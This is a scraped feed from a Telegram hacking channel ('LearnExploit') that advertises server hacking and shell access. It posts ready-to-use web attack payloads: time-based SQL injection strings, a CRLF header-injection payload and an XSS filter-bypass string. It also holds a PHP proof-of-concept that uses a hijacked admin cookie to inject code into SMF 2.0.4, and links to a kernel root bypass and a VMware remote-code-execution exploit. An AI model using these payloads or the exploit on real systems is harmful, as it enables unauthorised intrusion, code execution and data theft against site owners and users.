0Day.Today | Learn Exploit | Zero World | Dark web |
18.8K subscribers
1.23K photos
123 videos
487 files
1.26K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
😂😐

#Fun
——————
0Day.Today
@LearnExploit
@Tech_Army
😁26🫡3
vless://d88cb128-8dcb-4216-b121-82a901c2ede2@s.thisisforu.sbs:43978?type=tcp&security=none#GR_SV5_MCI_MTN-%40LearnExploit

دویست گیگ داره
دونیت کنین بیشترش میکنم🔥
TRX:
TJqtCmgFUYkptcvzDuW8c4JRQNm5zpUwPA

#v2ray #config
——————
0Day.Today
@LearnExploit
@Tech_Army
👍9❤‍🔥5
3am
Sajad Shahi
Mood...

hr
——————
0Day.Today
@LearnExploit
@Tech_Army
💔4👍1👎1
CVE-2024-0193 - Kernel Root Bypass

Github

#CVE #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥21🔥1
MITRE Caldera - Automated Adversary Emulation Platform

Github

#RedTeam #Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥6🆒1
SQL Injection

GET 
/0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z/Folder/
HTTP/1.1


#sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
7
OriON - OriON is a virtual machine in Spanish that incorporates several tools for Open Source Intelligence (OSINT) on people

Github

#Osint
——————
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥21
CRLF Injection Payload

payload : %0D%0ASomeCustomInjectedHeader:%20injected_by_fffffff

#CRLF #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
3👍1
little payload to bypass filters (in the proper context)

/*${/*/;{/**/(alert)(1)}//>

#Payload #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥3👍211
One File, Two Payloads

Read

#Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
👍2
Sql Injection Payload

Payload : 0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z

#Payload #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥6👍1
مدیر وبسایت Breachedforum که محل خرید و فروش دیتابیس ها بود به 15 سال زندان در آمریکا محکوم شد!

#news
——————
0Day.Today
@LearnExploit
@Tech_Army
😢16👍21
👩‍💻 VMware vRealize Log Insight Unauthenticated Remote Code Execution

⬇️ Download
🔒 LearnExploit

#VMware #Remote #Code

🔥 0Day.Today
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
63👍1🔥1
SMF 2.0.4 admin payload code execution

⚪️ proof of concept that latest SMF (2.0.4) can be
exploited by php injection.

⚪️ payload code must escape from \', so you should try with something like that:

⚪️ p0c\';phpinfo();// as a 'dictionary' value. Same story for locale parameter.

⚪️ For character_set - another story, as far as I remember, because here we have

⚪️ a nice stored xss. ;)

⚪️ to successfully exploit smf 2.0.4 we need correct admin's cookie:

Code:
<?php
$cookie = 'SMFCookie956=allCookiesHere';
$ch = curl_init('http://smf_2.0.4/index.php?action=admin;area=languages;sa=editlang;lid=english');
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_POST, 1); // send as POST (to 'On')
curl_setopt($ch, CURLOPT_POSTFIELDS, "character_set=en&locale=helloworld&dictionary=p0c\\';phpinfo();//&spelling=american&ce0361602df1=c6772abdb6d5e3f403bd65e3c3c2a2c0&save_main=Save");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$page = curl_exec($ch);
echo 'PHP code:<br>'.$page;
curl_close($ch); // to close 'logged-in' part
?>


#Execution #XSS #Payload

🔥 0Day.Today
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
93👍2👨‍💻1